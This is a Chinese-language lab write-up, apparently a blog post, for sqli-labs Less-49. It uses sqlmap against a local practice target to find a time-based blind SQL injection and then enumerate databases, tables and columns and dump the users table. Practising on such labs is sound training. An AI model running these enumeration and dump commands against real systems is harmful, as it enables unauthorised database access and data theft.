sqli-labs-Less-49

SQLI-LAPS 实验记录

Less-49

这一关与上一关类似,也是盲注,页面上没有任何反馈信息,同样我们采用sqlmap工具来帮助进行自动化注入。

首先我们在命令行中输入sqlmap命令:

sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch

结果如图所示,只有时间盲注方式可以选择,接下来我们继续采用sqlmap自动化注入。

sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch --dbs

结果如图所示,页面返回数据库的名称,注入有效。


之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。

  • 爆出表名:
php 复制代码
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security --tables
  • 爆出列名:
php 复制代码
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --columns
  • 爆出内容:
php 复制代码
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --dump
相关推荐
韩楚风5 分钟前
【参天引擎】Cantian 服务端框架全景解析:进程架构、模块组成与交互关系
数据库·mysql·架构·cantian
Listen·Rain14 分钟前
数据库流式查询
java·数据库
雨辰AI31 分钟前
生产级实战:人大金仓 V9 标准化运维手册(日常巡检 + 监控告警 + 应急处置)
java·运维·数据库·后端
阿拉斯攀登2 小时前
向量数据库选型:Milvus vs Chroma vs Elasticsearch
数据库·elasticsearch·milvus·知识库·rag·个人知识库
彦为君2 小时前
Redis最新版本特性
java·数据库·redis·算法·bootstrap
菩提小狗2 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
vigor5122 小时前
MySQL通过Mango实现分库分表
android·数据库·mysql
weixin199701080162 小时前
[特殊字符]《京东订单API(jd.order.detail.get)对接ERP:企业认证+OAuth授权避坑指南》(附Python源码)
java·数据库·python
赵渝强老师2 小时前
【赵渝强老师】高斯数据库(openGauss)的模式
数据库·opengauss·国产数据库·高斯数据库